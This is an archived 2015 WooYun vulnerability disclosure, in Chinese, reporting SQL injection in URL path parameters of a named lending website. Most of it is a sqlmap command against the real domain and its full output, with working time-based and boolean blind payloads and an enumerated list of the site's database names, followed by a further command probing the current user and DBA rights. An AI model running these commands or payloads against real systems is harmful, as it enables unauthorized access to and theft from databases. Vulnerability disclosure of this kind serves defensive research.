乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-05: 细节已通知厂商并且等待厂商处理中 2015-11-10: 厂商已经主动忽略漏洞,细节向公众公开
我搜索了,这些没有提交过吧,不会再来一个重复ID?没有信心提交这个网站了!~~~多个参数存在注入点!~~~
地址:
sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 10 --dbms "MySQL"
money、deadline、lt、co_id后面的数字存在注入sqlmap测试
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y[00:21:43] [INFO] testing connection to the target URL[00:21:48] [INFO] testing if the target URL is stable. This can take a couple of seconds[00:21:53] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'and provide a string or regular expression to match onhow do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit][00:21:55] [INFO] testing if URI parameter '#1*' is dynamic[00:21:59] [WARNING] URI parameter '#1*' does not appear dynamic[00:22:04] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable[00:22:04] [INFO] testing for SQL injection on URI parameter '#1*'[00:22:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[00:23:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[00:23:58] [INFO] testing 'MySQL inline queries'[00:24:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'[00:24:02] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[00:24:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[00:25:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[00:31:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[00:37:26] [WARNING] URI parameter '#1*' is not injectable[00:37:26] [INFO] testing if URI parameter '#2*' is dynamic[00:37:31] [INFO] confirming that URI parameter '#2*' is dynamic[00:37:35] [INFO] URI parameter '#2*' is dynamic[00:37:36] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might not be injectable[00:37:36] [INFO] testing for SQL injection on URI parameter '#2*'[00:37:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[00:37:38] [WARNING] reflective value(s) found and filtering out[00:38:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[00:38:15] [INFO] testing 'MySQL inline queries'[00:38:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'[00:38:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[00:39:31] [INFO] URI parameter '#2*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable[00:39:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[00:39:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[00:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[00:40:26] [INFO] checking if the injection point on URI parameter '#2*' is a false positiveURI parameter '#2*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y[00:43:18] [INFO] testing if URI parameter '#3*' is dynamic[00:43:23] [INFO] confirming that URI parameter '#3*' is dynamic[00:43:28] [INFO] URI parameter '#3*' is dynamic[00:43:29] [WARNING] heuristic (basic) test shows that URI parameter '#3*' might not be injectable[00:43:29] [INFO] testing for SQL injection on URI parameter '#3*'[00:43:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[00:43:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[00:44:10] [INFO] testing 'MySQL inline queries'[00:44:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'[00:44:24] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[00:45:25] [INFO] URI parameter '#3*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable[00:45:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[00:45:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[00:46:18] [INFO] checking if the injection point on URI parameter '#3*' is a false positiveURI parameter '#3*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y[00:54:38] [INFO] testing if URI parameter '#4*' is dynamic[00:54:42] [INFO] confirming that URI parameter '#4*' is dynamic[00:54:47] [INFO] URI parameter '#4*' is dynamic[00:54:48] [WARNING] heuristic (basic) test shows that URI parameter '#4*' might not be injectable[00:54:48] [INFO] testing for SQL injection on URI parameter '#4*'[00:54:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[00:55:08] [INFO] URI parameter '#4*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable[00:55:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[00:55:09] [INFO] testing 'MySQL inline queries'[00:55:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'[00:55:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[00:56:15] [INFO] URI parameter '#4*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable[00:56:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[00:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'URI parameter '#4*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y[00:58:24] [INFO] testing if URI parameter '#5*' is dynamic[00:58:31] [INFO] confirming that URI parameter '#5*' is dynamic[00:58:36] [INFO] URI parameter '#5*' is dynamic[00:58:43] [WARNING] heuristic (basic) test shows that URI parameter '#5*' might not be injectable[00:58:43] [INFO] testing for SQL injection on URI parameter '#5*'[00:58:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[00:59:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[00:59:56] [INFO] testing 'MySQL inline queries'[01:00:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'[01:00:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[01:01:16] [INFO] URI parameter '#5*' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable[01:01:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[01:01:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[01:02:09] [INFO] checking if the injection point on URI parameter '#5*' is a false positiveURI parameter '#5*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection points with a total of 470 HTTP(s) requests:---Place: URIParameter: #2* Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1 AND SLEEP(5)/deadline/3/lt/1/co_id/1Place: URIParameter: #5* Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/lt/1/co_id/1 AND SLEEP(5)Place: URIParameter: #4* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/lt/1 AND 4532=4532/co_id/1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/lt/1 AND SLEEP(5)/co_id/1Place: URIParameter: #3* Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3 AND SLEEP(5)/lt/1/co_id/1---there were multiple injection points, please select the one to use for following injections:[0] place: URI, parameter: #2*, type: Unescaped numeric (default)[1] place: URI, parameter: #3*, type: Unescaped numeric[2] place: URI, parameter: #4*, type: Unescaped numeric[3] place: URI, parameter: #5*, type: Unescaped numeric[q] Quit> 0[01:06:50] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11
available databases [8]:[*] daimayi[*] huomayi[*] information_schema[*] mayishequ[*] mysql[*] myxd[*] performance_schema[*] test
sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 1 --dbms "MySQL" --current-db --current-user --is-dba --time-sec 60由于是延时注入,实在太慢了,就不继续了!
如上
过滤修复
危害等级:无影响厂商忽略
忽略时间:2015-11-10 08:56
漏洞Rank:4 (WooYun评价)
暂无